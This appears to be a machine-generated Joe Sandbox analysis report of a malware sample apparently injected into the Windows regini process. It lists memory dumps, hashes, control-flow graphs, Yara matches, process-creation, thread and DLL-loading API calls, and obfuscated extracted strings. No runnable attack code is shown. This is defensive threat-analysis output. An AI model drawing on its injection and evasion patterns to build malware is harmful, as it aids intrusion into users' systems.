                                                                                  • Instruction ID: c5cd1b794bd7c10e573a6a9d17368cfb09a858349fd63a00c817c15cd50c31b3
                                                                                  • Opcode Fuzzy Hash: 016fe8f301f645f077be96b6922fb1dc4938847982b237a05f26e6b0f6b76417
                                                                                  • Instruction Fuzzy Hash: 4D900221246442525A46B1594404907400697E02417A5C016A141CB70C85279D56E621
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                  • Instruction ID: 0adc8368fc2c5423924803c49ed29fbf967981449dade7367c9a97926c91c0ea
                                                                                  • Opcode Fuzzy Hash: 0c0ce6e586f76ff05c013c08e1819b243ef1cbc645bed8bb89f393fb751614fc
                                                                                  • Instruction Fuzzy Hash: 6E90023120540513D61271594504B07000987D0241FA5C416A042C778D96578E52B121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                  • Instruction ID: 0e236aa776d6c721add0c2dcf999fa85db210998c860baa00c136f647343eb3a
                                                                                  • Opcode Fuzzy Hash: 2ac3e2d8a459095f36d886692d5f2958518bc47a46fdfd7180654985e65b9e5b
                                                                                  • Instruction Fuzzy Hash: 3590022921740102D68171595408A0B000587D1202FA5D419A001D778CC9168D696321
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d55f990469be61f57129806a8f470a751fa70b0d44e7127c8cfc1460a64b035b
                                                                                  • Instruction ID: 541b8471501b2996ca5ad8d11203fd218d40facfd89b4ac521544e35e60feee3
                                                                                  • Opcode Fuzzy Hash: d55f990469be61f57129806a8f470a751fa70b0d44e7127c8cfc1460a64b035b
                                                                                  • Instruction Fuzzy Hash: FB90022130540103D64171595418A074005D7E1301F65D015E041C774CD9168D566222
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: cdcbb85a5760b262856cc425d51ba9fde4341034be848a279c98e8bb3d6ec342
                                                                                  • Instruction ID: f3fc1ee3db002859638476f42366b275dc1c784c0d84cb2e5f04cdc34c48f2f2
                                                                                  • Opcode Fuzzy Hash: cdcbb85a5760b262856cc425d51ba9fde4341034be848a279c98e8bb3d6ec342
                                                                                  • Instruction Fuzzy Hash: E490023160950502D60171594514B07100587D0201F75C415A042C778D87968E5175A2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0defba690f09b9dd4c363c6d17187c30beeeb748ada34457e06e552c4e35d263
                                                                                  • Instruction ID: c7a1b97e34968cb607486bd6b8f84839d2e9b6bbfa596e265e3d07eb7415c8a1
                                                                                  • Opcode Fuzzy Hash: 0defba690f09b9dd4c363c6d17187c30beeeb748ada34457e06e552c4e35d263
                                                                                  • Instruction Fuzzy Hash: AA90022124945202D651715D4404A174005A7E0201F65C025A081C7B4D85568D557221

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 437 470eab-470ebb 439 470ef3-470ef9 437->439 440 470ebd 437->440 442 470efb-470efe 439->442 443 470f59 439->443 441 470ebe-470ed6 440->441 444 470ed9 441->444 445 470f00-470f24 442->445 446 470e8b-470e99 442->446 447 470f5a-470f9a call 4746e0 call 461470 call 481e30 443->447 448 470eda-470edf 444->448 445->447 451 470e9b-470eaa 446->451 452 470e6a-470e79 446->452 466 470f9c-470fab PostThreadMessageW 447->466 467 470fba-470fc0 447->467 453 470e87-470e89 448->453 454 470ee1-470ee2 448->454 451->437 451->448 457 470e21-470e42 452->457 458 470e1e-470e1f 452->458 453->444 453->446 454->439 460 470e44-470e45 457->460 461 470e53-470e61 457->461 458->457 460->441 464 470e47-470e51 460->464 461->452 464->461 466->467 468 470fad-470fb7 466->468 468->467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 0-962170130
                                                                                  • Opcode ID: 56b97a2f5a8506107941531bb8e58fd2207cffca377e0f64ecbf00a9c5e3b444
                                                                                  • Instruction ID: fc59755509782bf9c6bbab87adbf2b14663f8375936eba9899550b7518fbe263
                                                                                  • Opcode Fuzzy Hash: 56b97a2f5a8506107941531bb8e58fd2207cffca377e0f64ecbf00a9c5e3b444
                                                                                  • Instruction Fuzzy Hash: C5412371407395FFC7129F748C819EFBF68EE02764718895EE9449B352E2288907CB85

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 469 470ee6-470ef1 470 470ef3-470ef9 469->470 471 470f5a-470f9a call 4746e0 call 461470 call 481e30 469->471 472 470efb-470efe 470->472 473 470f59 470->473 498 470f9c-470fab PostThreadMessageW 471->498 499 470fba-470fc0 471->499 475 470f00-470f24 472->475 476 470e8b-470e99 472->476 473->471 475->471 479 470e9b-470eaa 476->479 480 470e6a-470e79 476->480 483 470eab-470ebb 479->483 484 470eda-470edf 479->484 488 470e21-470e42 480->488 489 470e1e-470e1f 480->489 483->470 492 470ebd 483->492 490 470e87-470e89 484->490 491 470ee1-470ee2 484->491 494 470e44-470e45 488->494 495 470e53-470e61 488->495 489->488 490->476 496 470ed9 490->496 491->470 497 470ebe-470ed6 492->497 494->497 500 470e47-470e51 494->500 495->480 496->484 497->496 498->499 501 470fad-470fb7 498->501 500->495 501->499
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 00470FA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130
                                                                                  • Opcode ID: 47c90f7124cb5510441c4f3681964bb234bd83d513d7e694fcac5fe7132f47ad
                                                                                  • Instruction ID: 853ab2f343b14b92cf6d757d6452b5ef2888b20aca811e2fc2c5acfd1011bf8c
                                                                                  • Opcode Fuzzy Hash: 47c90f7124cb5510441c4f3681964bb234bd83d513d7e694fcac5fe7132f47ad
                                                                                  • Instruction Fuzzy Hash: A7115076D03214BA97216AA08C429FFB73CEA427A4B108166FA18E7201E66C8D034BE5

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 502 470f30-470f62 call 48b880 call 48c290 507 470f68-470f9a call 461470 call 481e30 502->507 508 470f63 call 4746e0 502->508 513 470f9c-470fab PostThreadMessageW 507->513 514 470fba-470fc0 507->514 508->507 513->514 515 470fad-470fb7 513->515 515->514
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 00470FA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130
                                                                                  • Opcode ID: 8077691329809588e460174acb943b2c54cecef21bc24317baeded8d31bc4bcc
                                                                                  • Instruction ID: 22871f9c5f55576d9fde3f11fe166702731866422777ca6255a833daacfbe9ae
                                                                                  • Opcode Fuzzy Hash: 8077691329809588e460174acb943b2c54cecef21bc24317baeded8d31bc4bcc
                                                                                  • Instruction Fuzzy Hash: 750184B1D0121C7AEB11BAE58C82DEFBB7CEF41794F048059FA48A7241D6785E064BB5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 4b3665abde7fd93ce6ecd6e6654fec9989670edcc31e3f05bf5f63bdbdbfbdd3
                                                                                  • Instruction ID: 45156c42babda01769eec07e3e3993afc31ee041db43c5fb684071ce52a966d3
                                                                                  • Opcode Fuzzy Hash: 4b3665abde7fd93ce6ecd6e6654fec9989670edcc31e3f05bf5f63bdbdbfbdd3
                                                                                  • Instruction Fuzzy Hash: D7414475A006099FDB10DF99D8809EFB7B9FF88314F10856AE909EB310D775AE45CBA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 14b54004d69abd41e4c5224c5c92bb81af82decf163dd48d3913dd3e9082d8a7
                                                                                  • Instruction ID: ac6cc4c95f8142371abbe82b4e96dd9c3b04c8eb70f4586730afbe11a4cdf0f7
                                                                                  • Opcode Fuzzy Hash: 14b54004d69abd41e4c5224c5c92bb81af82decf163dd48d3913dd3e9082d8a7
                                                                                  • Instruction Fuzzy Hash: 7E3130B5A0060AAFDB14DFD8D8809EFB7B9FF88304B10855AE505EB214D775EE05CBA4
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00489A9C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: 14G
                                                                                  • API String ID: 3298025750-2306503025
                                                                                  • Opcode ID: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                                  • Instruction ID: 6ed8852c843ea5ae9b43187cdd817a6f60b1f81c09e8f1643be2342e60062821
                                                                                  • Opcode Fuzzy Hash: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                                  • Instruction Fuzzy Hash: CDE065B6200204BBD614EE5ADC42FAB77ACEF88714F00440AFA0CA7242D774B9108BB9
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00483D4B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: wininet.dll
                                                                                  • API String ID: 3472027048-3354682871
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00474752
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00474752
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  APIs
                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,004784DE,00000010,?,?,?,00000044,?,00000010,004784DE,?,?,?), ref: 00489B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInternalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2186235152-0
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00469EF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00469EF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00471BC9,?,?,00471BC9,_XH,?,?,00471BC9,_XH,00001000,?,?,00000000), ref: 00489A4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0047854C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0047854C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00471EC0,0048819F,_XH,00471E83), ref: 00478343
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_460000_regini.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ;hs$!<>6$##?6$52!:$608<$:'|f$:='<$??2|$`d}`$c}ab$db}j$f}cs$|`j}$|f`d$}`e
                                                                                  • API String ID: 0-2596724842
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                  • Instruction ID: c8f2eb597b586735d897f7d55e6ba94963f11143a7e693b8f862f39286aa9881
                                                                                  • Opcode Fuzzy Hash: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                  • Instruction Fuzzy Hash: 10510471A80665ABDB20CF9CC8909BEB7B9EB44204B04D459EA97C7641EB74DE08CB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515680340.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2ba0000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ADNL$CHI$D@LJ$DNLY$HUNE$LCJH$LYDB$L[DK$L]]A$YDBC$YHUY$]ADN
                                                                                  • API String ID: 0-311086289
                                                                                  • Opcode ID: 6e62b8c6f790ad737a6b49497b5e734bf6c555e6bd5404a6d93f4002c434663f
                                                                                  • Instruction ID: 34e579311cab524b5f45b3002b39ca1eab1d14e4910759c4de195aa34db8b1c0
                                                                                  • Opcode Fuzzy Hash: 6e62b8c6f790ad737a6b49497b5e734bf6c555e6bd5404a6d93f4002c434663f
                                                                                  • Instruction Fuzzy Hash: 553104B0A1434CEBCF14DF84D1046DEBBB1FB05348F824059E8296F615C7769A55CB88
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02DE4655
                                                                                  • Execute=1, xrefs: 02DE4713
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02DE46FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02DE4787
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02DE4725
                                                                                  • ExecuteOptions, xrefs: 02DE46A0
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02DE4742
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 97c0c1b5c79620cb0543d32c46be95eacad5425426c42974c0a4a41a59d28d8d
                                                                                  • Instruction ID: 2fdd819de320bc85eda1b7933be2301bf9cb9340d3e03ed0800f8f26001da04b
                                                                                  • Opcode Fuzzy Hash: 97c0c1b5c79620cb0543d32c46be95eacad5425426c42974c0a4a41a59d28d8d
                                                                                  • Instruction Fuzzy Hash: E451E7316402596AFF11ABA8DCA5FEEB7B9EF04304F140099D506A7391EB71DE45CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E69000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002E6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_2d40000_regini.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
